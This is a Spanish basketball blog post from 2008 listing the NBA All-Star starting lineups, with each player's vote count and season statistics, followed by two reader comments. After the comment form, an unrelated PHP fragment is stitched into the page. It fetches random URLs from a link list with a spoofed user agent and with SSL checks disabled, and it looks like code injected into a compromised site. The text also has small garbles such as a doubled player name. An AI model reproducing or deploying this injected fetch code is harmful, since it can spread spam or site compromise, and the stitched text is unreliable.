Quintetos del All-Star

25 de January de 2008 por Viva_Dirk

Ya tenemos decididos los quintetos para el All-Star, los seguidores de la NBA en todo el planeta han decidido lo siguiente:

Conferencia Este

Jason KKiddidd

El base de New Jersey ha conseguido 1.246.386 votos en la que será su 9ª aparición en un All-Star. Los números de Kidd no dejan dudas en su elección, 11.3 puntos, 8.3 rebotes y 10.6 asistencias para el base mas completo desde la retirada de Magic Johnson. A punto de cumplir los 34, Jason sigue dando lecciones cada noche.

Dwyane Wade

Wade

Pese a que Miami es uno de los peores equipos de la liga, Wade sigue siendo uno de los favoritos del público y ha recibido 1.608.260 votos. 25 puntos, 4.2 rebotes, 6.8 asistencias y 2 robos son los números del que fuera MVP en las finales de la temporada 2005-2006 y que participará por 4ª vez consecutiva en el partido de las estrellas.

LeBron James

LeBron James

El Elegido ha recibido 2.108.831 votos para llegar a este su 4ª All-Star. James es actualmente el máximo anotador de la competición con 29.5 puntos, que completa con 7.6 rebotes,7.4 asistencias, 2 robos y 1.1 tapones, lo que le convierte hasta la fecha en el jugador mas completo de la liga ‘estadisticamente’ hablando.

Kevin Garnett

Kevin Garnett

Su nueva etapa en los Celtics ha convertido a Kevin Garnett en el jugador mas popular de la liga, sus 2.399.148 así lo dicen. The Big Ticket ha dejado a un lado sus grandes números y se ha convertido en el pilar de los verdes tanto en ataque como(sobre todo) en defensa. Aun así promedia 19.5 puntos, 9.8 rebotes, 3.8 asistencias, 1.4 robos y 1.4 tapones, con un 55% en tiros. Así se presenta Garnett a su 11º All-Star.

Dwight Howard

Howard

Los 2.066.991 votos recibidos por el center de Orlando le llevan a su 2º All-Star, y a su primera titularidad en el mismo. Lidera la liga en rebotes con 14.9 capturas por encuentro, que completa con 22 puntos y 2.6 tapones. Batió el record de Shaq como jugador mas joven en coger 3.000 rebotes y actualmente es el jugador que anota mas de 20 puntos con mejor porcentaje de tiro.

Conferencia Oeste

Allen Iverson

Iverson

Con 1.203.152 votos, el base de Denver logra su primera titularidad en el Oeste, aunque será su 10º All-Star. The Answer presenta los mejores porcentajes de tiro desde su año sophomore con un 45.6%, sigue siendo uno de los máximos anotadores con 27 puntos, a los que suma 6.9 asistencias y 2.1 robos.

Kobe Bryant

Kobe Bryant

La estrella de los Lakers ha recibido 2.004.940, para la que será su 10ª aparición en el All-Star. Bryant presenta unos números con 27.4 puntos, 6 rebotes, 5.1 asistencias y 2 robos de balón. Con el a la cabeza, los Lakers han sido una de las grandes sorpresa de esta primera mitad de la temporada, y con la lesión de Bynum seguramente le tocará redoblar esfuerzos.

Carmelo Anthony

Carmelo Anthony

Anthony consigue la titularidad en su 2º All-Star gracias a los 1.723.701 votos que ha recibido. La temporada de Carmelo nos deja en su tarjeta 25.5 puntos, 7 rebotes y 3.4 asistencias. Denver marcha lider de su división con el y Iverson como máximos referentes ofensivos, y es el único equipo que coloca a 2 jugadores entre los 10 elegidos por el público.

Tim Duncan

Tim Duncan

A sus 31 años, Duncan jugará su 10º All-Star, todas las campañas que Tim lleva en la liga ha sido All-Star….siempre que ha habido All-Star, en esta ocasión han sido 1.712.800 votos los que ha recibido. Los 19.4 puntos, 11.2 rebotes, 3.1 asistencias y 1.9 tapones son el reflejo numérico que deja el juego del de las Islas Vírgenes.

Yao Ming

Yao Ming

Yao ha recibido 1.709.180 votos para llegar a su 6º partido de las estrellas en su 6ª temporada en la NBA. El chino promedia 22.4 puntos, 10.7 rebotes, 2.5 asistencias y 2.3 tapones en lo que va de temporada, y los problemas físicos de McGrady le dejan como claro lider de los Rockets en la tarea de llegar a play-offs.

Comenta

2 comentarios a esta entrada

  1. RusticoColorao dice:
    #1

    Pufff…discutible como todo, pero echo de menos a Paul por Iverson de todas todas.

      Citar

  2. telekoman dice:
    #2

    Yo también. Eso de que una de las grandes revelaciones de la temporada junto con Portland no tenga ni un sólo representante en el quinteto inicial… El problema es que como esto va por que bien que me caes en lugar de por lo bien que juegas… Es que ni siquiera está Nash. Y date con un canto en los dientes de que no esté Chaq en lugar de Howard

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>